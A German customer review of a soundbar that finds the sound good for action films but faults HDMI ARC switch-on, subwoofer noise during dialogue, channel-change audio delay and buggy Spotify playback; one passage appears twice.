Gewöhnungsbedürftig, aber nicht tragisch – vl kommt der effekt ja auch vom fernseher (mit den internen lautsprechern ist das aber nicht so). Musik mit spotify (ein must have für mich) funktioniert, aber dann doch wieder nicht gut. Hier zeigten sich wieder ein paar bugs.
    1. Ehrlich gesagt, kann ich die vielen guten rezensionen hier nicht nachvollziehen. Ich bin bestimmt kein hifi experte, aber das produkt überzeugt mich nicht wirklich. Laut produktbeschreibung kann die soundbar zwar fast alles, dann aber doch wieder nichts wirklich gut. Der sound der soundbar ist dabei wirklich gut wenn man sich einen actionfilm oder dergleichen ansieht, der bass ist zwar nicht wirklich harmonisch und etwas ruppig und die höhen nicht immer gut, aber für den preis wäre das noch akzeptabel und ausreichend – auf jeden fall besser als alle tv lautsprecher. Hier hat sich gezeigt, dass hdmi arc meist zwar gut funktioniert, die soundbar aber öfters nicht mit dem tv mit einschaltet – warum auch immer. Bei normalen fernsehen zeigt die soundbar bereits erste schwächen, ich habe wirklich kein so gutes gehör, aber der subwoofer nervt da einfach immer – habe ihn bereits auf stufe 1 zurück gestellt und trotzdem kommt immer ein latentes hintergrundrauschen bei dialogen aus dem woofer – die grenzfrequenz ist hier leider viel zu hoch, vor allem wenn man leise fernsehen will eine absolute katastrophe. Bei einem senderwechsel verzögert die soundbar und braucht ein 1-2 sekunden bis der ton einsetzt. Gewöhnungsbedürftig, aber nicht tragisch – vl kommt der effekt ja auch vom fernseher (mit den internen lautsprechern ist das aber nicht so). Musik mit spotify (ein must have für mich) funktioniert, aber dann doch wieder nicht gut. Hier zeigten sich wieder ein paar bugs.

Comments are closed.